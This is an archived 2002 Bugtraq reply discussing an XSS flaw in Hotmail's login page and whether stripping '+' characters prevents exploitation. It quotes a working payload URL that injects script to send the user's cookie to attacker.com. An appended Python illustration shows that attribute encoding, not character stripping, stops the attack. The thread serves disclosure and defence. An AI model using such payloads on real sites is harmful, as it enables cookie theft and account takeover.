[27351] in bugtraq
RE: XSS bug in hotmail login page
daemon@ATHENA.MIT.EDU (Russell Harding)
Tue Oct 8 18:39:47 2002
Date: Mon, 7 Oct 2002 23:50:38 -0700 (MST)
From: Russell Harding <hardingr@cunap.com>
To: Thor Larholm <Thor@jubii.dk>
In-Reply-To: <52D05AEFB0D95C4BAD179A054A54CDEB03470DED@mailsrv1.jubii.dk>
Message-ID: <Pine.LNX.4.33.0210072341010.20064-100000@phantomphlux.dhs.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello, comments below:
On Mon, 7 Oct 2002, Thor Larholm wrote:
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests. While you can view your own cookies easily, I'm not
sure if you can still exploit this bug. I do know filtering these
characters prevents this sort of attack:
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=
Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?
-Russell
P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?
On Mon, 7 Oct 2002, Thor Larholm wrote:
> > From: Peter Rdam [mailto:hell@weedmail.com]
> > They didn't react, and I'm pretty curious about what
> > is possible with the bug. And I actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
>
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer
>
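An added illustration, not code from this thread or from Hotmail, of the distinction Russell's message turns on: dropping "+" and "%2B" from the request is a blocklist on one character and leaves the `"><script>` attribute breakout in the cb value untouched, whereas encoding the value for the attribute context it is written into neutralises it. The hidden-input markup and the assumption that the CGI has already URL-decoded the parameter are mine.

```python
import html

# Constructed: the cb= value from the URL quoted in the thread, as the server
# would see it after URL decoding (assumption: %2B has been decoded to '+').
CB_VALUE = ("\"><script>document.location.replace("
            "'http://attacker.com/steal.cgi?'+document.cookie);</script>")

# Assumed markup: the login page echoes cb back inside a quoted attribute.
TEMPLATE = '<input type="hidden" name="cb" value="{cb}">'


def strip_plus(value: str) -> str:
    """The character-stripping behaviour described in the thread: remove the
    literal '+' and its encoded form. Nothing else about the value changes."""
    return value.replace("%2B", "").replace("+", "")


def attribute_encode(value: str) -> str:
    """Context-aware output encoding for an HTML attribute: '&', '<', '>',
    '"' and "'" become entities, so the value cannot close the attribute or
    open a tag regardless of which characters the request contained."""
    return html.escape(value, quote=True)


def render(value: str, sanitize) -> str:
    """Build the page fragment using the given sanitiser on the cb value."""
    return TEMPLATE.format(cb=sanitize(value))


def breaks_out(fragment: str) -> bool:
    """Detection check for a response: the template never emits a <script>
    tag, so one appearing in the rendered fragment means the attribute was
    closed by user-controlled input."""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for name, fn in (("strip '+'", strip_plus), ("attribute-encode", attribute_encode)):
        page = render(CB_VALUE, fn)
        print(f"{name:17s} -> breakout: {breaks_out(page)}")
        print("   ", page)
```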